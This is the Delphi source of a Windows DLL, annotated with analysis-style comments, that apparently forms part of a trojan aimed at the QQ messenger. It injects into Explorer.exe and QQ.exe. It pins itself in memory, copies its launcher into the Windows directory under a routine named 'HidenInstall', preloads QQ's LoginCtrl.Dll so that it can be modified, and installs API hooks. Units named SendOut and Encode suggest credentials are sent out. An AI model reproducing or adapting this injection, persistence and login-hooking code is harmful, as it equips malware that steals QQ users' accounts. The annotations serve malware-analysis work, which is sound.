📄 divqq32.~dpr
library divqq32;
{ Important note about DLL memory management: ShareMem must be the
first unit in your library's USES clause AND your project's (select
Project-View Source) USES clause if your DLL exports any procedures or
functions that pass strings as parameters or function results. This
applies to all strings passed to and from your DLL--even those that
are nested in records and classes. ShareMem is the interface unit to
the BORLNDMM.DLL shared memory manager, which must be deployed along
with your DLL. To avoid using BORLNDMM.DLL, pass string information
using PChar or ShortString parameters. }
uses
Windows,
Messages,
SysUtils,
InsertHook in 'InsertHook.pas',
CallSelf in 'CallSelf.pas',
Common in 'Common.pas',
Thread in 'Thread.pas',
MsgHook in 'MsgHook.pas',
FunUnit in 'FunUnit.pas',
ReEntry in 'ReEntry.pas',
VarUnit in 'VarUnit.pas',
ApiHook3 in 'ApiHook3.pas',
TempWindow in 'TempWindow.pas',
RegSet in 'RegSet.pas',
SendOut in 'SendOut.pas',
Encode in 'Encode.pas',
ShareData in 'ShareData.pas',
QQThread in 'QQThread.pas';
{$R *.res}
exports
InsertHookOn, InsertHookOff,GetShareData,
MsgHookOn, MsgHookOff;
// Host-process names that the library's initialization code compares against
// the file name of the process it has been loaded into.
const
sProcess = 'Explorer.exe'; // name of the process the DLL is to be inserted into
destPorcess = 'QQ.exe'; // name of the target process
type
// Layout of the shared file-mapping view that the initialization code maps
// with SizeOf(TMapDllData) and reads CurThreadID and ExeFile from.
TMapDllData = record
CurThreadID : DWORD; // thread id that receives WM_QUIT from the initialization code
ExeFile : String[255]; // short string; read into CallerExeFile and passed to HidenInstall
end;
PMapDllData = ^TMapDllData;
var
ModuleFileName: array [0..MAX_PATH] of Char; // buffer filled by GetModuleFileName
PMainDllData: PMapDllData; // view of the file mapping named by sFileMap
CallerExeFile : String; // copy of PMainDllData^.ExeFile
DestExePath : String; // directory of the host executable in the QQ.exe branch
MutexHandle, FileHandle, SubThreadID: DWORD;
// Case-insensitive string comparison.
// Returns True when CompareString reports the two strings as equal under the
// user's default locale with NORM_IGNORECASE; any other result (including the
// failure value 0) yields False.
function CompareAnsiText(const S1, S2: string): Boolean;
var
CmpCode: Integer;
begin
// -1 lengths tell CompareString that both inputs are null-terminated.
CmpCode := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, PChar(S1), -1, PChar(S2), -1);
// 2 is the "strings are equal" return value of CompareString.
Result := (CmpCode = 2);
end;
// Copies a file into the Windows directory.
// sourceFN: full path of the file to copy.
// Returns the path of the copy when CopyFile succeeds; otherwise (copy failed,
// or the source already is the destination) returns sourceFN unchanged.
// Analysis note: the copy keeps the source's base name, so a file with the
// launcher's own name appearing directly under the Windows directory is a
// host artifact of this routine.
function HidenInstall(sourceFN : String) : String;
// Returns the Windows directory path, with a trailing backslash appended when
// the value from GetWindowsDirectory does not already end in one.
function WindowsDirectory: string;
var
WinDir: array [0..MAX_PATH] of char;
begin
GetWindowsDirectory(WinDir, MAX_PATH);
Result := WinDir;
if Result[Length(Result)] <> '\' then
Result := Result + '\';
end;
var
destFN : String;
begin
Result := sourceFN;
destFN := WindowsDirectory + ExtractFileName(sourceFN);
// Nothing to do when the file is already at the destination path
// (compared case-insensitively).
if CompareAnsiText(sourceFN,destFN) then Exit;
// Third argument False = bFailIfExists off, so an existing file of the same
// name in the Windows directory is overwritten.
if CopyFile(PChar(sourceFN),PChar(destFN),False) then
Result := destFN;
end;
// DLL callback (earlier version, left commented out by the author)
{procedure DllMain(dwReason: DWord);
begin
if (dwReason = DLL_PROCESS_DETACH) then ApiHookOff();
end;}
// DLL notification handler, installed through DllProc by the initialization code.
// dwReason: one of the DLL_* notification codes.
// Only DLL_PROCESS_DETACH does any work; the other three codes are empty.
procedure DllEntryPoint(dwReason: DWord);
begin
case dwReason of
DLL_PROCESS_ATTACH:;
DLL_PROCESS_DETACH:
begin
// CurIsQQ is set by the initialization code only in the QQ.exe branch, just
// before ApiHookOn is called, so the hooks are removed only where they were
// installed.
if CurIsQQ then
ApiHookOff();
// Runs in every host process on unload (defined in the ShareData unit).
ShareData.CloseShareData;
end;
DLL_THREAD_ATTACH:;
DLL_THREAD_DETACH:;
end;
end;
// Library initialization: runs in every process that loads this DLL and
// branches on the host executable's file name (sProcess / destPorcess).
// Analysis note: the behaviour visible here gives these host observables --
// the DLL holding an extra reference on itself inside Explorer.exe, a named
// mutex (DllMutex) and a named file mapping (sFileMap) whose names are defined
// in other units, a file copied into the Windows directory by HidenInstall,
// and an early load of LoginCtrl.Dll inside QQ.exe followed by ApiHookOn.
begin
// Get the name of the current module (handle 0 = the host process executable).
GetModuleFileName(0, @ModuleFileName[0], MAX_PATH);
if CompareAnsiText(ExtractFileName(ModuleFileName), sProcess) then
begin
// Make sure only one thread is created: DllMutex is used as a "worker already
// running" marker. It is only opened here; presumably it is created by
// ThreadPro or another unit -- confirm there.
MutexHandle := OpenMutex(MUTEX_ALL_ACCESS, FALSE, DllMutex);
if (MutexHandle <> 0) then
begin
CloseHandle(MutexHandle);
end
else begin
CurIsExplorer := True;
ShareData.CreateShareData;
if ShareData.GetShareData <> nil then begin
// Create the worker sub-thread inside sProcess.
CreateThread(nil, 0, @ThreadPro, nil, 0, SubThreadID);
// Increase this DLL's own reference count: it loads itself by path, so one
// later FreeLibrary from whatever loaded it does not unload it.
GetModuleFileName(HInstance, @ModuleFileName[0], MAX_PATH);
LoadLibrary(@ModuleFileName[0]);
// Tell Start.exe to exit: the launcher's thread id and executable path are
// read from the shared mapping, then WM_QUIT is posted to that thread.
FileHandle := OpenFileMapping(FILE_MAP_ALL_ACCESS, False, sFileMap);
PMainDllData := MapViewOfFile(FileHandle, FILE_MAP_ALL_ACCESS, 0, 0, SizeOf(TMapDllData));
PostThreadMessage(PMainDllData^.CurThreadID, WM_QUIT, 0, 0);
CallerExeFile := PMainDllData^.ExeFile;
// Copy the launcher executable into the Windows directory and record the
// resulting path in the shared data's CfgFileName field.
ShareData.GetShareData.CfgFileName := HidenInstall(CallerExeFile);
// Increase Start.exe's reference count to prevent it from being modified
// (author's stated intent): the copied file is loaded into this process.
LoadLibrary(PChar(Trim(String(ShareData.GetShareData.CfgFileName))));
UnmapViewOfFile(PMainDllData);
CloseHandle(FileHandle);
end;
end;
end else if CompareAnsiText(ExtractFileName(ModuleFileName), destPorcess) then begin
ShareData.OpenShareData;
QQProcessID := GetCurrentProcessID();
CreateThread(nil, 0, @QQThreadPro, nil, 0, SubThreadID);/////
MutexHandle := OpenMutex(MUTEX_ALL_ACCESS, FALSE, DllMutex);
if (MutexHandle <> 0) then
begin
CloseHandle(MutexHandle);
// If the thread has already been created, treat this load as a MsgHook
// initiated by a new thread.
CurIsQQ := True;
DestExePath := ExtractFilePath(ModuleFileName); // current path (directory of the host executable)
LoadLibrary(PChar(DestExePath + 'LoginCtrl.Dll')); // loaded early so that it can be modified
// ApiHookOn is defined in another unit (presumably ApiHook3 -- confirm).
ApiHookOn();
end;
end;
// Register the notification handler so DLL_PROCESS_DETACH reaches
// DllEntryPoint, then invoke it once for attach (a no-op in that handler).
DllProc := @DllEntryPoint;
DllEntryPoint(DLL_PROCESS_ATTACH);
end.